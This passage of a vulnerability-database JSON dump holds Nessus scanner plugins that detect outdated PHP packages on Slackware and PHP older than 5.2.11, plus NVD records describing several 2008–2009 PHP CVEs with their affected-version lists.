Advisory 2010-024-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44121);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4142\", \"CVE-2009-4143\");\n script_bugtraq_id(37079, 37390);\n script_xref(name:\"SSA\", value:\"2010-024-02\");\n\n script_name(english:\"Slackware 11.0 / 12.0 / 12.1 / 12.2 / 13.0 / current : php (SSA:2010-024-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2,\n13.0, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.490297\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78ed463b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"11.0\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"13.0\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.2.12\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:54:22", "description": "According to its banner, the version of PHP installed on the remote\nhost is older than 5.2.11. Such versions may be affected by several\nsecurity issues :\n\n - An unspecified error occurs in certificate validation\n inside 'php_openssl_apply_verification_policy'.\n\n - An unspecified input validation vulnerability affects\n the color index in 'imagecolortransparent()'.\n\n - An unspecified input validation vulnerability affects\n exif processing.\n\n - Calling 'popen()' with an invalid mode can cause a\n crash under Windows. (Bug #44683)\n\n - An integer overflow in 'xml_utf8_decode()' can make it\n easier to bypass cross-site scripting and SQL injection \n protection mechanisms using a specially crafted string \n with a long UTF-8 encoding. (Bug #49687)\n\n - 'proc_open()' can bypass 'safe_mode_protected_env_vars'.\n (Bug #49026)", "edition": 25, "published": "2009-09-18T00:00:00", "title": "PHP < 5.2.11 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4018", "CVE-2009-3292", "CVE-2009-5016", "CVE-2009-3291", "CVE-2009-3293", "CVE-2009-3294"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_2_11.NASL", "href": "https://www.tenable.com/plugins/nessus/41014", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41014);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2009-3291\",\n \"CVE-2009-3292\",\n \"CVE-2009-3293\",\n \"CVE-2009-3294\",\n \"CVE-2009-4018\",\n \"CVE-2009-5016\"\n );\n script_bugtraq_id(36449, 44889);\n script_xref(name:\"Secunia\", value:\"36791\");\n\n script_name(english:\"PHP < 5.2.11 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PHP\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP installed on the remote\nhost is older than 5.2.11. Such versions may be affected by several\nsecurity issues :\n\n - An unspecified error occurs in certificate validation\n inside 'php_openssl_apply_verification_policy'.\n\n - An unspecified input validation vulnerability affects\n the color index in 'imagecolortransparent()'.\n\n - An unspecified input validation vulnerability affects\n exif processing.\n\n - Calling 'popen()' with an invalid mode can cause a\n crash under Windows. (Bug #44683)\n\n - An integer overflow in 'xml_utf8_decode()' can make it\n easier to bypass cross-site scripting and SQL injection \n protection mechanisms using a specially crafted string \n with a long UTF-8 encoding. (Bug #49687)\n\n - 'proc_open()' can bypass 'safe_mode_protected_env_vars'.\n (Bug #49026)\"\n );\n\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.2.11\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/releases/5_2_11.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://news.php.net/php.internals/45597\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.2.11\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to PHP version 5.2.11 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 134, 264);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^[0-4]\\.\" || \n version =~ \"^5\\.[01]\\.\" || \n version =~ \"^5\\.2\\.([0-9]|10)($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.2.11\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-10-03T11:51:06", "description": "The dba_replace function in PHP 5.2.6 and 4.x allows context-dependent attackers to cause a denial of service (file truncation) via a key with the NULL byte. NOTE: this might only be a vulnerability in limited circumstances in which the attacker can modify or add database entries but does not have permissions to truncate the file.", "edition": 3, "cvss3": {}, "published": "2009-08-25T10:30:00", "title": "CVE-2008-7068", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7068"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:4.2", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:4.0.6"], "id": "CVE-2008-7068", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7068", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:23", "description": "The proc_open function in ext/standard/proc_open.c in PHP before 5.2.11 and 5.3.x before 5.3.1 does not enforce the (1) safe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars directives, which allows context-dependent attackers to execute programs with an arbitrary environment via the env parameter, as demonstrated by a crafted value of the LD_LIBRARY_PATH environment variable.", "edition": 5, "cvss3": {}, "published": "2009-11-29T13:07:00", "title": "CVE-2009-4018", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4018"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.0", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:4.2", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:1.0", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6"], "id": "CVE-2009-4018", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:54:19", "description": "PHP before 5.2.12 and 5.3.x before 5.3.1 does not restrict the number of temporary files created when handling a multipart/form-data POST request, which allows remote attackers to cause a denial of service (resource exhaustion), and makes it easier for remote attackers to exploit local file inclusion vulnerabilities, via multiple requests, related to lack of support for the max_file_uploads directive.", "edition": 3, "cvss3": {}, "published": "2009-11-24T00:30:00", "title": "CVE-2009-4017", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, 